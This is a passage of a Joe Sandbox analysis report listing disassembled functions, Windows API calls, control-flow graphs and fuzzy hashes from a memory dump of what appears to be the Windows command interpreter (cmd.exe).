                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ConsoleInfoLocaleOutputThread
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1263632223-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fc7f53c72406f2665155f2e89e8cd509c5e261b01271f0e88dac702e7ad54b14
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a57d0862e7564244867be756561ccbbe1fb7c581457a855a143544de01267d2d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc7f53c72406f2665155f2e89e8cd509c5e261b01271f0e88dac702e7ad54b14
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A1159F5909363A9F7B04F10FD0AFB626E4A712340F84023EED96A5191D76C4881831E
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001A9D4 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 876 1a9d4-1a9e4 GetEnvironmentStringsW 877 1a9e6-1aa04 call 1aa20 GetProcessHeap RtlAllocateHeap 876->877 878 1aa19-1aa1d 876->878 881 1aa11-1aa18 FreeEnvironmentStringsW 877->881 882 1aa06-1aa0e memcpy 877->882 881->878 882->881
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0001A9C5), ref: 0001A9D8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0001A9F3
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0001A9FA
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0001AA09
                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0001AA12
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemcpy
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 429350006-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ee49d3fe04d63071e135b8b1195b44c979f4a0b125241a6ba2b0c1152001cc78
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: edfb9d2bc2817b166d5a65454e6f4e81622d13e14f2d3bed1a1f2bc4e504e7bc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee49d3fe04d63071e135b8b1195b44c979f4a0b125241a6ba2b0c1152001cc78
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1E09277702A2027E311272A7C88DAF2A9DDFC6672F050114F909D3201DF288C4286B7
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001E3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 883 1e3f0-1e403 884 1e405-1e41d call 26e25 883->884 885 1e45d 883->885 888 1e422-1e427 884->888 887 1e45f-1e463 885->887 889 2dc4a-2dc66 call 334d4 888->889 890 1e42d-1e43b 888->890 889->887 891 1e441-1e44f 890->891 892 2dc6b-2dc72 ??_V@YAXPAX@Z 890->892 894 1e451-1e45a memset 891->894 895 1e466-1e468 891->895 894->885 895->894
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00015F21,-00000001), ref: 0002DC6C
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 0002DC57
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-3416068913
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c4dbb43a82edafc7aa86c6af44e19b92966f65307c83d401443afb1bd8a342c8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5cff4b1926ef1ea8f391c3580d3ca1eb8a4a7a80c1b1f8e5938fbcb5b652ad78
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4dbb43a82edafc7aa86c6af44e19b92966f65307c83d401443afb1bd8a342c8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C012871704344A7D7788624EC5ABABB2D9DFC0310F10452EFD5AC7281DAA6EC8082A1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0002742D Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _callnewh.MSVCRT ref: 00027437
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000274D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(000277EC,00000001), ref: 000274E7
                                                                                                                                                                                                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00027444
                                                                                                                                                                                                                                                                                                                                                                                                                          • _CxxThrowException.MSVCRT(?,0003CBF8), ref: 000277F5
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ??0exception@@ExceptionThrow_callnewhmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 813871643-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 413eeb441fd5fd630803437d687e15b94a46d28824b769afa31e348565704b75
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd8edcd6c34883ecc864d7afcd3ab00a47512baa87f9e45b21eaaf572a362f0e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 413eeb441fd5fd630803437d687e15b94a46d28824b769afa31e348565704b75
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1E0DF3540C22DB7CF2076A5FC0ADEE3F6C8B80320B6480A4B91DA6492EF30DA12C6D1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00015EA3 Relevance: 3.3, APIs: 2, Instructions: 292COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00015EFB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00058BF0,00000000,?), ref: 00018EC3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00020060: wcschr.MSVCRT ref: 0002006C
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00015FF7
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$memset$CurrentDirectoryiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4234405029-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ef21cde8e406072c889da38c829a515135cbd27cf687645e3adc3b814d2eb921
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 42ceefb884adfbc73514ff7223fc694cf9a42e1906aa482c0461cf2a4c6ad7d1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef21cde8e406072c889da38c829a515135cbd27cf687645e3adc3b814d2eb921
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FA1E1716083519BD768DB20D8496BFB7E5EFC5310F04892DF88AC7291EB78C985CB52
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001E470 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-1631433037
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c57aaaea36fbfc98fea6e85e5c070deed7154f244beca6ff733915f63a39c9ed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5589122b118740a34c86663ff68c134056d40f01ac9fb94966e587fee62d05fc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c57aaaea36fbfc98fea6e85e5c070deed7154f244beca6ff733915f63a39c9ed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97411470B04BD14BDBB4AB28E9557EE72D7AB90758F14042AFD0683292FA74DCC08693
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00026E30 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00026E37
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002742D: malloc.MSVCRT ref: 00027444
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: H_prolog3_catchmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 125873668-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 73e24613cd00e82a164a16a74995890d23ef48b0ce9c06623a8eed751d5ce0b7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: dca323a8a31140cf2da8ba85cf8fc4430379c4cecb3c34dab26b883094f23dfa
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73e24613cd00e82a164a16a74995890d23ef48b0ce9c06623a8eed751d5ce0b7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85C08C29129130D6DF4077A0F00279C2A10AB00B02F908044F80819087DE7945282B51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00021A05 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 74c3fdbf5d93528e3f3ba0871e29b10041783f0f6a891acbedc00378f3ce24a5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2d5917cedf43638a109774def49e2037d7cfb864acbd01a0e63a6e1758c02de2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74c3fdbf5d93528e3f3ba0871e29b10041783f0f6a891acbedc00378f3ce24a5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2E0867774B2312BE23C55A9BC87F978A9DCBD0B71F290136F6049A181E9D14D0442A5

                                                                                                                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00034191 Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 000341B9
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 000341CA
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00034205
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 0003426C
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00039E02,?,00000010), ref: 00034283
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 00034292
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000342B1
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000342C4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 000342D2
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 000342D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0003432F
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 00034336
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 000343DB
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 000343F0
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00034405
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0003441A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0003442F
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00034444
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00034459
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 000344A5
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 000344F0
                                                                                                                                                                                                                                                                                                                                                                                                                          • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 00034506
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 0003451D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00034565
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 0003456C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 00034595
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0003459C
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 000345C3
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00039E02,?,00000000), ref: 000345D4
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 000345DD
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2991647268-3100821235
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 26bac2c1992ae7156fbbd721761579d861d81aa22e0f6be05a101375e3325c71
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fa13035c93fa65a92891b7366d1287012341d72c9af9d68b0c38b59d5a71a7b0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26bac2c1992ae7156fbbd721761579d861d81aa22e0f6be05a101375e3325c71
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFC10F706043019FEB119F64DC48A2BBBE9FF8A715F044A2CF956CB2A0D779D984CB12
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00014C10 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 552COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
